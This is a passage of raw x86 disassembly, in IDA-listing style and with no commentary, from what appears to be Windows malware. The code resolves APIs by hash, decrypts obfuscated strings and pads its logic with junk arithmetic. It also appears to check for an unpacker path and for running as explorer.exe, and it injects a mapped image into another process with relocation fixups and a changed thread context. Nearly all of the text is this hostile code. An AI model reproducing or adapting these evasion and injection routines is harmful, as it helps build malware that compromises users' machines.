jmp short loc_401C59
; ---------------------------------------------------------------------------
loc_401C56: ; CODE XREF: sub_4017D5+436�j
; sub_4017D5+444�j
or eax, 0FFFFFFFFh
loc_401C59: ; CODE XREF: sub_4017D5+431�j
; sub_4017D5+47F�j
pop ebx
leave
retn
sub_4017D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C5C proc near ; CODE XREF: sub_4029EF:loc_402CFE�p
; DATA XREF: sub_40286B+135�o
var_3B8 = byte ptr -3B8h
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1A8 = byte ptr -1A8h
var_198 = byte ptr -198h
var_188 = byte ptr -188h
var_178 = byte ptr -178h
var_168 = byte ptr -168h
var_158 = byte ptr -158h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_38 = byte ptr -38h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
push ebp
mov ebp, esp
sub esp, 3B8h
push ebx
push esi
push edi
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
call sub_40102E
mov edi, 0C8AC8026h
xor ebx, ebx
push edi
inc ebx
push ebx
call sub_401117
add esp, 14h
push esi
call eax
push 0Ah
push esi
push offset dword_4031F4
call sub_40102E
push edi
push ebx
call sub_401117
add esp, 14h
push esi
call eax
push 0Ch
push esi
push offset dword_4031E4
call sub_40102E
push edi
push ebx
call sub_401117
add esp, 14h
push esi
call eax
cmp dword_404104, 10h
jl short loc_401CD2
inc dword_404104
loc_401CD2: ; CODE XREF: sub_401C5C+6E�j
cmp dword_404104, 0D9h
jle short loc_401CE8
mov dword_404104, 16h
loc_401CE8: ; CODE XREF: sub_401C5C+80�j
push 7A813811h
xor edi, edi
push ebx
mov [ebp+var_24], edi
call sub_401117
pop ecx
pop ecx
call eax
push 50h
movzx ebx, ax
pop eax
push 25h
mov [ebp+var_28], ebx
pop ecx
loc_401D08: ; CODE XREF: sub_401C5C+BF�j
cmp ecx, 0ABh
ja short loc_401D12
inc eax
inc ecx
loc_401D12: ; CODE XREF: sub_401C5C+B2�j
add eax, 2Dh
add ecx, 2Dh
cmp eax, 6Eh
jl short loc_401D08
push 3
push esi
push offset dword_4031E0
mov dword_404104, eax
call sub_40102E
push 67ECDE97h
push 1
call sub_401117
add esp, 14h
push edi
push edi
push edi
push edi
lea ecx, [ebp+var_24]
push ecx
push edi
push edi
push esi
call eax
push 2
push esi
push offset dword_4031DC
call sub_40102E
push [ebp+var_24]
lea eax, [ebp+var_48]
push esi
push eax
call dword_403014 ; wsprintfA
add esp, 18h
cmp dword_404104, 84h
jge short loc_401D7B
inc dword_404104
loc_401D7B: ; CODE XREF: sub_401C5C+117�j
push 0Ah
push esi
push offset dword_4031D0
call sub_40102E
mov edi, dword_403000
add esp, 0Ch
push esi
lea eax, [ebp+var_1B8]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_4031C0
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_1A8]
push eax
call edi ; lstrcpy
push 9
push esi
push offset dword_4031B4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_198]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset dword_4031A4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_188]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_403194
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_178]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset loc_403184
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_168]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset aCSmM ; "ÑÊÌÌCÄèMÃM"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_158]
push eax
call edi ; lstrcpy
cmp bx, 419h
jz loc_402458
call sub_401094
test eax, eax
jnz loc_402458
and [ebp+var_20], eax
mov ebx, dword_40300C
loc_401E58: ; CODE XREF: sub_401C5C+58A�j
cmp [ebp+var_20], 0
jnz short loc_401E68
push 22h
push esi
push offset nullsub_3
jmp short loc_401E70
; ---------------------------------------------------------------------------
loc_401E68: ; CODE XREF: sub_401C5C+200�j
push 23h
push esi
push offset nullsub_2
loc_401E70: ; CODE XREF: sub_401C5C+20A�j
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_3B8]
push eax
call edi ; lstrcpy
push 3
push esi
push offset aNt ; "NâÑ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 17h
push esi
push offset aEignIsOAoFcd ; "ÇÍEIGNÂIèÇËÇ`OÍÄaOÍÄäcd"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017D5
add esp, 0Ch
push 2
push esi
push offset dword_403110
call sub_40102E
add esp, 0Ch
lea eax, [ebp+var_2B8]
push esi
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_28], 410h
jnz short loc_401F67
lea eax, [ebp+var_1A8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 6
push esi
push offset dword_403108
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017D5
add esp, 0Ch
mov [ebp+var_C], eax
jmp loc_40216C
; ---------------------------------------------------------------------------
loc_401F67: ; CODE XREF: sub_401C5C+2AF�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset dword_4030FC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017D5
push 2
push esi
push offset dword_403110
mov [ebp+var_C], eax
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_178]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_4030EC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017D5
add [ebp+var_C], eax
push 2
push esi
push offset dword_403110
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset nullsub_1
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017D5
add [ebp+var_C], eax
push 2
push esi
push offset dword_403110
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_198]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Eh
push esi
push offset aJjFhOjs ; "JJÉÇÃFHÊOJèÇËÇ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017D5
add [ebp+var_C], eax
push 2
push esi
push offset dword_403110
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_188]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset aDIIeS ; "ÄDÊÆIÆIEÆèÇËÇ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017D5
add esp, 0Ch
add [ebp+var_C], eax
loc_40216C: ; CODE XREF: sub_401C5C+306�j
push 2
push esi
push offset dword_403110
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset aIDDmmhhc ; "IÊDÆDMMHHC"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017D5
add eax, [ebp+var_C]
add esp, 0Ch
test eax, eax
jg short loc_4021F1
inc [ebp+var_20]
cmp [ebp+var_20], 2
jl loc_401E58
jmp loc_402458
; ---------------------------------------------------------------------------
loc_4021F1: ; CODE XREF: sub_401C5C+581�j
push 3
push esi
push offset aNt ; "NâÑ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
mov eax, dword_404104
add eax, 0FFFFFFD2h
cmp eax, 0ADh
ja short loc_40223D
inc dword_404104
loc_40223D: ; CODE XREF: sub_401C5C+5D9�j
push 1Fh
push esi
push offset aJcnHSOAoFcdNhM ; "JCNÉÅÎHÅÂèÇËÇ`OÍÄaOÍÄäcdìNHÍMga"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
push 4Dh
pop eax
push 45h
pop ecx
loc_402271: ; CODE XREF: sub_401C5C+62A�j
cmp ecx, 0ECh
ja short loc_40227B
inc eax
inc ecx
loc_40227B: ; CODE XREF: sub_401C5C+61B�j
add eax, 0Ah
add ecx, 0Ah
cmp eax, 0C2h
jl short loc_402271
push 2
push esi
mov edi, offset dword_403090
push edi
mov dword_404104, eax
call sub_40102E
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_8]
add al, 1Dh
add esp, 18h
cmp byte ptr [ebp+var_8+1], 0
mov [ebp+var_13], al
jnz short loc_4022C2
mov [ebp+var_11], 30h
jmp short loc_4022CA
; ---------------------------------------------------------------------------
loc_4022C2: ; CODE XREF: sub_401C5C+65E�j
mov al, byte ptr [ebp+var_8+1]
add al, 13h
mov [ebp+var_11], al
loc_4022CA: ; CODE XREF: sub_401C5C+664�j
push 3
pop eax
push 0FFFFFFF2h
pop ecx
loc_4022D0: ; CODE XREF: sub_401C5C+689�j
cmp ecx, 0E1h
ja short loc_4022DA
inc eax
inc ecx
loc_4022DA: ; CODE XREF: sub_401C5C+67A�j
add eax, 13h
add ecx, 13h
cmp eax, 0B7h
jl short loc_4022D0
push 2
push esi
push edi
mov dword_404104, eax
call sub_40102E
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_4]
add al, 17h
add esp, 18h
cmp byte ptr [ebp+var_4+1], 0
mov [ebp+var_14], al
jnz short loc_40231C
mov [ebp+var_12], 30h
jmp short loc_402324
; ---------------------------------------------------------------------------
loc_40231C: ; CODE XREF: sub_401C5C+6B8�j
mov al, byte ptr [ebp+var_4+1]
add al, 19h
mov [ebp+var_12], al
loc_402324: ; CODE XREF: sub_401C5C+6BE�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_10], 0
call ebx ; lstrcat
push 7
push esi
push offset dword_403088
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
cmp dword_404104, 64h
jge short loc_402372
inc dword_404104
loc_402372: ; CODE XREF: sub_401C5C+70E�j
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_8]
add esp, 18h
test ah, ah
mov [ebp+var_1B], al
mov [ebp+var_1A], 30h
jz short loc_4023A0
mov [ebp+var_1A], ah
loc_4023A0: ; CODE XREF: sub_401C5C+73F�j
cmp dword_404104, 11h
jl short loc_4023AF
inc dword_404104
loc_4023AF: ; CODE XREF: sub_401C5C+74B�j
cmp dword_404104, 0B7h
jle short loc_4023C5
mov dword_404104, 14h
loc_4023C5: ; CODE XREF: sub_401C5C+75D�j
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_4]
add esp, 18h
test ah, ah
mov [ebp+var_19], al
mov [ebp+var_1C], 30h
jz short loc_4023F3
mov [ebp+var_1C], ah
loc_4023F3: ; CODE XREF: sub_401C5C+792�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_18], 0
call ebx ; lstrcat
push 4
push esi
push offset dword_403080
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017D5
mov eax, dword_404104
add eax, 0FFFFFFADh
add esp, 0Ch
cmp eax, 94h
ja short loc_402458
inc dword_404104
loc_402458: ; CODE XREF: sub_401C5C+1E0�j
; sub_401C5C+1ED�j ...
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push 0
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_401C5C endp
; =============== S U B R O U T I N E =======================================
sub_40246F proc near ; DATA XREF: sub_40286B+4D�o
push esi
push edi
mov edi, 81F0F0DFh
push edi
push 1
call sub_401117
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
jmp short loc_4024B7
; ---------------------------------------------------------------------------
loc_402485: ; CODE XREF: sub_40246F+4F�j
push 1297812Ch
push 1
call sub_401117
pop ecx
pop ecx
call eax
cmp eax, 2
jz short loc_4024C0
push 3D9972F5h
push 1
call sub_401117
pop ecx
pop ecx
push 3E8h
call eax
push edi
push 1
call sub_401117
loc_4024B7: ; CODE XREF: sub_40246F+14�j
pop ecx
pop ecx
push esi
call eax
test eax, eax
jz short loc_402485
loc_4024C0: ; CODE XREF: sub_40246F+29�j
pop edi
xor eax, eax
pop esi
retn 4
sub_40246F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024C7 proc near ; CODE XREF: sub_40286B+13A�p
; sub_4029EF+134�p ...
var_310 = dword ptr -310h
var_260 = dword ptr -260h
var_44 = byte ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 310h
push ebx
push esi
push edi
call sub_401113
and eax, 0FFFF0000h
mov ecx, [eax+3Ch]
add ecx, eax
mov [ebp+var_18], eax
lea eax, [ecx+18h]
mov esi, [eax+38h]
mov [ebp+var_14], eax
mov eax, dword_404104
add eax, 0FFFFFFFBh
cmp eax, 0DDh
mov [ebp+var_24], ecx
mov [ebp+var_1C], esi
ja short loc_402509
inc dword_404104
loc_402509: ; CODE XREF: sub_4024C7+3A�j
push 0A08B638Ch
xor ebx, ebx
push 1
mov [ebp+var_1], bl
call sub_401117
pop ecx
pop ecx
push 9
call eax
mov edi, eax
mov eax, dword_404104
neg edi
sbb edi, edi
and edi, 3Ch
add eax, 0FFFFFFF9h
add edi, 4
cmp eax, 0E1h
ja short loc_402541
inc dword_404104
loc_402541: ; CODE XREF: sub_4024C7+72�j
push 0EF0A25B7h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push esi
push ebx
push edi
push ebx
push 0FFFFFFFFh
call eax
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_402566
xor al, al
jmp loc_402866
; ---------------------------------------------------------------------------
loc_402566: ; CODE XREF: sub_4024C7+96�j
push 5CD9430h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push 2
push [ebp+var_C]
call eax
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_40282B
cmp dword_404104, 9
jl short loc_402598
inc dword_404104
loc_402598: ; CODE XREF: sub_4024C7+C9�j
cmp dword_404104, 0BDh
jle short loc_4025AE
mov dword_404104, 1Bh
loc_4025AE: ; CODE XREF: sub_4024C7+DB�j
push 12h
mov esi, offset dword_404108
push esi
push offset aYoKmdxVmnKh ; "ØÅYOÇÔKMDXÌVMNÅKHÈ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_44]
push eax
call dword_403000 ; lstrcpy
push 9
push esi
push offset aS ; "ÈÅÍÉÉèÍÉÉ"
call sub_40102E
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 1FC0EAEEh
push 1
mov esi, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_44]
push ecx
push esi
call eax
cmp dword_404104, 13h
mov [ebp+var_10], ebx
jge short loc_402616
inc dword_404104
loc_402616: ; CODE XREF: sub_4024C7+147�j
mov esi, [ebp+var_1C]
push edi
push ebx
push 1
lea ecx, [ebp+var_20]
push ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_10]
push ecx
push [ebp+arg_4]
mov [ebp+var_20], esi
push [ebp+var_C]
call eax
mov edi, [ebp+var_18]
push esi
push edi
push [ebp+var_8]
call sub_4010EE
add esp, 0Ch
cmp dword_404104, 51h
jge short loc_402652
inc dword_404104
loc_402652: ; CODE XREF: sub_4024C7+183�j
mov eax, [ebp+var_24]
movzx ecx, word ptr [eax+14h]
add ecx, [ebp+var_14]
push 39h
pop edx
push 0FFFFFFEAh
pop eax
loc_402662: ; CODE XREF: sub_4024C7+1B0�j
cmp eax, 8Eh
ja short loc_40266B
inc edx
inc eax
loc_40266B: ; CODE XREF: sub_4024C7+1A0�j
add edx, 17h
add eax, 17h
cmp edx, 0A2h
jl short loc_402662
mov esi, [ebp+var_10]
mov eax, esi
sub eax, edi
cmp edx, 0Fh
mov dword_404104, edx
mov [ebp+var_14], eax
jl short loc_402695
inc edx
mov dword_404104, edx
loc_402695: ; CODE XREF: sub_4024C7+1C5�j
cmp edx, 0E0h
jle short loc_4026A6
push 14h
pop edx
mov dword_404104, edx
loc_4026A6: ; CODE XREF: sub_4024C7+1D4�j
mov eax, [ecx+34h]
add eax, edi
loc_4026AB: ; CODE XREF: sub_4024C7+1F5�j
cmp word ptr [eax], 0BE8Dh
jnz short loc_4026BB
cmp dword ptr [eax+6], 0C009078Bh
jz short loc_4026BE
loc_4026BB: ; CODE XREF: sub_4024C7+1E9�j
inc eax
jmp short loc_4026AB
; ---------------------------------------------------------------------------
loc_4026BE: ; CODE XREF: sub_4024C7+1F2�j
mov eax, [eax+2]
add eax, [ecx+0Ch]
add eax, edi
jmp short loc_4026D5
; ---------------------------------------------------------------------------
loc_4026C8: ; CODE XREF: sub_4024C7+210�j
add eax, 8
jmp short loc_4026CE
; ---------------------------------------------------------------------------
loc_4026CD: ; CODE XREF: sub_4024C7+20A�j
inc eax
loc_4026CE: ; CODE XREF: sub_4024C7+204�j
cmp [eax], bx
jnz short loc_4026CD
inc eax
inc eax
loc_4026D5: ; CODE XREF: sub_4024C7+1FF�j
cmp [eax], ebx
jnz short loc_4026C8
cmp edx, 0Eh
jge short loc_4026E5
inc edx
mov dword_404104, edx
loc_4026E5: ; CODE XREF: sub_4024C7+215�j
mov ecx, [ecx+0Ch]
mov edi, [ebp+var_8]
add eax, 4
lea edi, [ecx+edi-4]
mov cl, [eax]
inc eax
cmp cl, bl
jz short loc_402729
loc_4026F9: ; CODE XREF: sub_4024C7+257�j
cmp cl, 0F0h
jnb short loc_402705
movzx ecx, cl
add edi, ecx
jmp short loc_402714
; ---------------------------------------------------------------------------
loc_402705: ; CODE XREF: sub_4024C7+235�j
movzx edx, word ptr [eax]
and ecx, 0Fh
shl ecx, 10h
or ecx, edx
add edi, ecx
inc eax
inc eax
loc_402714: ; CODE XREF: sub_4024C7+23C�j
mov ecx, [ebp+var_14]
add [edi], ecx
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4026F9
mov esi, [ebp+var_10]
mov edx, dword_404104
loc_402729: ; CODE XREF: sub_4024C7+230�j
cmp edx, 8
jl short loc_402735
inc edx
mov dword_404104, edx
loc_402735: ; CODE XREF: sub_4024C7+265�j
cmp edx, 0C2h
jle short loc_402747
mov dword_404104, 17h
loc_402747: ; CODE XREF: sub_4024C7+274�j
sub esi, [ebp+var_18]
add esi, [ebp+arg_0]
cmp [ebp+arg_8], ebx
mov edi, esi
jnz short loc_4027AB
push 0E61874B3h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push edi
push ebx
push ebx
push [ebp+arg_4]
call eax
push 723EB0D5h
push 1
mov edi, eax
call sub_401117
pop ecx
pop ecx
push edi
call eax
cmp dword_404104, 0Ch
mov [ebp+var_1], 1
jl short loc_402793
inc dword_404104
loc_402793: ; CODE XREF: sub_4024C7+2C4�j
cmp dword_404104, 0D4h
jle short loc_402818
mov dword_404104, 20h
jmp short loc_402818
; ---------------------------------------------------------------------------
loc_4027AB: ; CODE XREF: sub_4024C7+28B�j
push 0AA1DE02Fh
push 1
mov [ebp+var_310], 10002h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
push 0AA1DC82Fh
push 1
mov [ebp+var_260], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
cmp dword_404104, 0Ah
mov [ebp+var_1], 1
jl short loc_402802
inc dword_404104
loc_402802: ; CODE XREF: sub_4024C7+333�j
cmp dword_404104, 97h
jle short loc_402818
mov dword_404104, 16h
loc_402818: ; CODE XREF: sub_4024C7+2D6�j
; sub_4024C7+2E2�j ...
push 77CD9567h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_40282B: ; CODE XREF: sub_4024C7+BC�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
cmp dword_404104, 2
jl short loc_40284D
inc dword_404104
loc_40284D: ; CODE XREF: sub_4024C7+37E�j
cmp dword_404104, 0BCh
jle short loc_402863
mov dword_404104, 1Eh
loc_402863: ; CODE XREF: sub_4024C7+390�j
mov al, [ebp+var_1]
loc_402866: ; CODE XREF: sub_4024C7+9A�j
pop edi
pop esi
pop ebx
leave
retn
sub_4024C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40286B proc near ; DATA XREF: sub_4029EF+12F�o
; sub_4029EF+2DD�o
var_14C = byte ptr -14Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14Ch
push ebx
push edi
xor ebx, ebx
push 3D9972F5h
inc ebx
push ebx
call sub_401117
pop ecx
pop ecx
push 7D0h
call eax
cmp dword_404104, 8Dh
jge short loc_40289F
inc dword_404104
loc_40289F: ; CODE XREF: sub_40286B+2C�j
push esi
push 6FB89AF0h
xor edi, edi
push ebx
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push edi
push edi
push offset sub_40246F
push edi
push edi
call eax
push 723EB0D5h
push ebx
mov esi, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
push 49A1374Ah
push ebx
call sub_401117
pop ecx
pop ecx
push 104h
lea ecx, [ebp+var_14C]
push ecx
call eax
push 0Ch
mov esi, offset dword_404108
push esi
push offset aFNHfSmM ; "ÑFÄNËHFÅèMÃM"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_14C]
push eax
call dword_40300C ; lstrcat
push 19h
pop eax
push 0FFFFFFCAh
pop ecx
loc_402917: ; CODE XREF: sub_40286B+C1�j
cmp ecx, 9Ah
ja short loc_402921
inc eax
inc ecx
loc_402921: ; CODE XREF: sub_40286B+B2�j
add eax, 16h
add ecx, 16h
cmp eax, 0B4h
jl short loc_402917
push 40h
lea eax, [ebp+var_44]
push edi
push eax
mov [ebp+var_48], 44h
call sub_4010BB
add esp, 0Ch
push 5
pop eax
push 0FFFFFFDAh
mov [ebp+var_1C], ebx
mov [ebp+var_18], ax
pop ecx
loc_402951: ; CODE XREF: sub_40286B+FB�j
cmp ecx, 0AEh
ja short loc_40295B
inc eax
inc ecx
loc_40295B: ; CODE XREF: sub_40286B+EC�j
add eax, 0Fh
add ecx, 0Fh
cmp eax, 86h
jl short loc_402951
push 46318AC7h
push ebx
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push offset dword_40420C
lea ecx, [ebp+var_48]
push ecx
push edi
push edi
push 4
push edi
push edi
push edi
lea ecx, [ebp+var_14C]
push ecx
push edi
call eax
push dword_404210
push dword_40420C
push offset sub_401C5C
call sub_4024C7
add esp, 0Ch
test al, al
jz short loc_4029C7
mov esi, dword_404210
push 7B88BF3Bh
push ebx
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_4029C7: ; CODE XREF: sub_40286B+144�j
cmp dword_404104, 7Dh
pop esi
jge short loc_4029D7
inc dword_404104
loc_4029D7: ; CODE XREF: sub_40286B+164�j
push 768AA260h
push ebx
call sub_401117
pop ecx
pop ecx
push edi
call eax
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_40286B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029EF proc near ; CODE XREF: start+1BC�j
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_38 = byte ptr -38h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_13C]
push edi
mov [ebp+var_4], eax
call sub_401304
xor ebx, ebx
test al, al
jz loc_402CFE
push 3
pop eax
push 0FFFFFFD2h
pop ecx
loc_402A19: ; CODE XREF: sub_4029EF+3F�j
cmp ecx, 0BDh
ja short loc_402A23
inc eax
inc ecx
loc_402A23: ; CODE XREF: sub_4029EF+30�j
add eax, 2Eh
add ecx, 2Eh
cmp eax, 0AEh
jl short loc_402A19
mov edi, 774393E8h
push edi
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
mov esi, 104h
push esi
lea ecx, [ebp+var_13C]
push ecx
push ebx
call eax
xor ecx, ecx
cmp eax, ebx
jz short loc_402A6F
loc_402A5A: ; CODE XREF: sub_4029EF+7E�j
lea edx, [ebp+ecx+var_13B]
cmp byte ptr [edx-1], 5Ch
jnz short loc_402A6A
mov [ebp+var_4], edx
loc_402A6A: ; CODE XREF: sub_4029EF+76�j
inc ecx
cmp ecx, eax
jnz short loc_402A5A
loc_402A6F: ; CODE XREF: sub_4029EF+69�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, 20202020h
or edx, eax
cmp edx, 6C707865h
jnz loc_402B55
mov edx, [ecx+4]
or edx, eax
cmp edx, 7265726Fh
jnz loc_402B55
mov ecx, [ecx+8]
or ecx, eax
cmp ecx, 6578652Eh
jnz loc_402B55
mov eax, [ebp+arg_4]
dec eax
jnz loc_402B4E
push 8
pop ecx
push 0Ch
mov esi, offset dword_404108
xor eax, eax
push esi
lea edi, [ebp+var_38]
